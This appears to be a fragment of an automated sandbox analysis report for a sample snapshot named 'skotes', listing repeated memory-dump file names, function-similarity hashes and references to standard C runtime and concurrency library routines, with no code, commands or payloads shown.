                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 893951542-0
                                                                                                                                                                                                                                              • Opcode ID: 29bb40c19d5c703877e9e6f9aa642cd2837a6ebe5a937f8a351c07851df8ab8c
                                                                                                                                                                                                                                              • Instruction ID: 7ea39788f0197c6b4e324950044c2138b928b343e836be8c35a93ea3d6dbf604
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29bb40c19d5c703877e9e6f9aa642cd2837a6ebe5a937f8a351c07851df8ab8c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F13126367016149FCB19AF20C885BBDB7E6EF89710F1541B9EB099F295DF30AD098B90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00BF2D0F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3433162309-0
                                                                                                                                                                                                                                              • Opcode ID: a2c02a440f5912de4952e0376c84100945a74560a7fe730b57979955c2106f73
                                                                                                                                                                                                                                              • Instruction ID: 5bdc8087a0b7547fa7458b97203258e1f593d4b5bc85571951ba9e6571dfd286
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2c02a440f5912de4952e0376c84100945a74560a7fe730b57979955c2106f73
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4310779A00309DFCF14DF94C8C0ABEBBF9EB44314F1404AADA45AB356D730A949DBA1
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 00C013FC
                                                                                                                                                                                                                                              • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00C01447
                                                                                                                                                                                                                                              • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00C0147A
                                                                                                                                                                                                                                              • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00C0152A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2092016602-0
                                                                                                                                                                                                                                              • Opcode ID: fdb756114d00a149dc7d34d4edd12ed53ed54379e7b95109ccbfabb409dd3355
                                                                                                                                                                                                                                              • Instruction ID: 6995d114d86d43a65a26a2c8321af95cbb02b1ca053197b156f348243df1649b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fdb756114d00a149dc7d34d4edd12ed53ed54379e7b95109ccbfabb409dd3355
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C531A371A006099FCF14DFA9C8919EDF7F1BF48710B18822DE526AB3D1DB34AA45CB90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                                                                                                                              • Opcode ID: f8543847f07726ee3c49c09d30cecc01f351075ae0b7e82b83cf81ea777003c3
                                                                                                                                                                                                                                              • Instruction ID: 74f59ea1929a9731ec60f8544cf756a0ec4062a3451105935b79763ed191b336
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8543847f07726ee3c49c09d30cecc01f351075ae0b7e82b83cf81ea777003c3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA2121759001599FDF00EFA5DC81DBFBBB9EF08710F100455F901A7251DB349D069B90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 00BF9C9C
                                                                                                                                                                                                                                              • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00BF9CE8
                                                                                                                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00BF9CFE
                                                                                                                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00BF9D6A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
